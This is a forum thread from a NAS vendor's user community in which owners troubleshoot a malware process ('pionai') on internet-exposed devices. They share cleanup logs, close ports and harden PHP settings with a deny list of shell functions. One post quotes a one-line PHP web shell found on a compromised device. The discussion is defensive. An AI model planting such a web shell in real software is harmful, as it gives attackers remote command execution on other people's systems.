Unknown Thread kthreaddnai

Don't miss a thing. Post your questions and discussion about other uncategorized NAS features here.
kameha
Starting out
Posts: 10
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha » Wed Nov 14, 2018 3:09 pm

Both Gitea and Nextcloud are exposed througth ContainerStation

versieck
First post
Posts: 1
Joined: Fri Sep 28, 2018 3:01 pm

Re: Unknown Thread kthreaddnai

Post by versieck » Wed Nov 14, 2018 7:39 pm

I encountered the same problem a few days ago.
I have no idea where this process originates from or what is does. It's a complete mystery.
Upgrading to the latest firmware (4.3.5.0756) did not solve the problem.
I did however install the Malware Remover and it did find some malware that was removed.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.log/.cgi_log.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//autorun.sh.infected.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//OewrradzZkb.


App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/.remover_B1KPMM.

After a reboot the pionai process was gone and my CPU usage was back to normal.
The Malware Remover will now scan every day at 03:00AM my system to keep it clean.

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Thu Nov 15, 2018 12:32 pm

The malware remover ran for me and did not find anything. After the restart, no process was visible for 2 hours. The process came back overnight. QNAP Support has not commented yet.

User avatar
OneCD
Ask me anything
Posts: 6021
Joined: Sun Aug 21, 2016 10:48 am
Location: "... there, behind that sofa!"

Re: Unknown Thread kthreaddnai

Post by OneCD » Thu Nov 15, 2018 1:18 pm

KV17uwe wrote:
Thu Nov 15, 2018 12:32 pm
After the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?

production NAS: TS-569 Pro with Debian 9.9 'Stretch' (power on/off times are < 1 minute)
backup NAS: TS-559 Pro+ with QTS 4.2.6 #20190322

one.cd.only@gmail.com

Image Image Image Image

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Thu Nov 15, 2018 5:09 pm

OneCD wrote:
Thu Nov 15, 2018 1:18 pm
KV17uwe wrote:
Thu Nov 15, 2018 12:32 pm
After the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?
yes.

cufiler
First post
Posts: 1
Joined: Tue Jun 05, 2012 3:10 pm

Re: Unknown Thread kthreaddnai

Post by cufiler » Thu Nov 15, 2018 6:13 pm

I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone call it from internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Fri Nov 16, 2018 1:05 pm

cufiler wrote:
Thu Nov 15, 2018 6:13 pm
I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone call it from internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to find commands posted by Kameha, I found some PHP files uploaded to run commands in my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
What are these settings?

I have already deleted the folder pionai under / tmp /. Also, I closed port 80. I have not yet made the settings in the INI data.

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Fri Nov 16, 2018 1:14 pm

Image

the services back there :(

mneiger
New here
Posts: 6
Joined: Thu May 05, 2016 2:57 am

Re: Unknown Thread kthreaddnai

Post by mneiger » Fri Nov 16, 2018 10:09 pm

I have the same critter in my TS-251.
I chased all size 37472 files (god, init, eth1, etc).
I suspect it also uses a few php files in /share/Web which I deleted
47D51F0071A7AA3AF1ED0669843E113B.php
images.php

good luck

User avatar
Trexx
Experience counts
Posts: 4699
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota
Contact:

Re: Unknown Thread kthreaddnai

Post by Trexx » Fri Nov 16, 2018 10:59 pm

You might try using the new malware remover to see if that cleans it better. BUT that is NOT going to prevent infection (it doesn't run real-time), it only removes it. The only way to 100% prevent infection is not to expose your NAS to the internet. A full featured IPS/IDS platform / reverse proxies/etc. can help mitigate risk as well.
Paul

Model: TS-877-1600 FW: 4.3.6.x
QTier (HDD): [RAID-5] 6 x 3TB HGST DeskStar NAS QTier (SSD): [RAID-1] 2 x 525GB Crucial MX300 m.2's
(SSD): [RAID-1] 2 x 500GB Evo 860
RAM: Kingston HyperX Fury 32GB Kit DDR4-2666
GPU: EVGA GTX 1060, ACX 2.0(1 Fan), 6GB
UPS: CyberPower AVR1350 Ext. Backup: USB 3.0 Seagate 5TB
Media Boxes: Nvidia ShieldTV Pro, AppleTV 4, Roku Stick

Model: TVS-673 32GB FW: 4.3.6.x Test/Backup Box
-----------------------------------------------------------------------------------------------------------------------------------------
NAS RAID Rebuild Times | Live QTS Videos | | QNAP NAS Guide | Information needed when you ask for HELP | QNAP Links, Tutorials, etc.
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq

dolbyman
Guru
Posts: 12905
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Unknown Thread kthreaddnai

Post by dolbyman » Fri Nov 16, 2018 11:41 pm

and all please open tickets with qnap so they can investigate+improve malware removal

kameha
Starting out
Posts: 10
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha » Sat Nov 17, 2018 5:49 pm

Hello !

I completely reinstall my Nas on the last days (data backup + full disk format on another PC).
All was OK until I reinstall yesterday CodexPack and PhotoStation so i suspect it's coming from one of them..

Still investigating...

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Mon Nov 19, 2018 2:19 pm

To close Port 80 has temporarily brought peace first. QNAP still has not processed my ticket.

maestro72x
Getting the hang of things
Posts: 62
Joined: Thu Jun 03, 2010 5:16 am

Re: Unknown Thread kthreaddnai

Post by maestro72x » Wed Nov 21, 2018 2:12 am

any luck getting rid of it? im having same issues

Elbows
Starting out
Posts: 27
Joined: Thu May 07, 2009 9:58 pm

Re: Unknown Thread kthreaddnai

Post by Elbows » Fri Nov 23, 2018 4:48 am

I had the 'pionai' process running and raised a helpdesk ticket.

I've posted the fix I was given here: viewtopic.php?f=182&t=144954&p=694152#p694152

It worked for me :-)
QNAP TS670 Pro (DEV/Backup box)
V4.3.5.n (latest)
5x Seagate 8TB Ironwolf RAID 5
QNAP TVS1282 (PRD box)
V4.3.5.n(latest)
5x Seagate 8TB Ironwolf RAID 5
Riello VSD 1500 UPS

Post Reply

Return to “Miscellaneous”